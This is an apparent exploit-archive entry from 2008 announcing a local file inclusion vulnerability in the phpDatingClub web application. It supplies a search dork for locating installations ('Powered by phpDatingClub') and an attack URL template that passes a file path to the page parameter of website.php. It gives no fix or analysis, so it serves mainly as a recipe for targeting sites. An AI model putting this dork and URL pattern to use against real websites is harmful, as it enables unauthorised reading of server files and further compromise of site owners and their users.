id: 3380
date: 07/09/2008
title: phpDatingClub (website.php page) Local File Inclusion Vulnerability
author: S.W.A.T.
cves: 

===================================================================
phpDatingClub (website.php page) Local File Inclusion Vulnerability
===================================================================



#########################################################
#
#     phpDatingClub Local File Include Vulnerability
#========================================================
#                            =
#    Author: Big Ben                                    =
#                                                       =
#========================================================
#
#    script :  http://www.w2b.ru/download/phpDatingClub.zip
#
#    DorK   :   Powered by phpDatingClub
#     
##########################################################
#
# Exploit:
#
# www.[target].com/Script/website.php?page=[LFI]
#
##########################################################



#  0day.today [2023-03-27]  #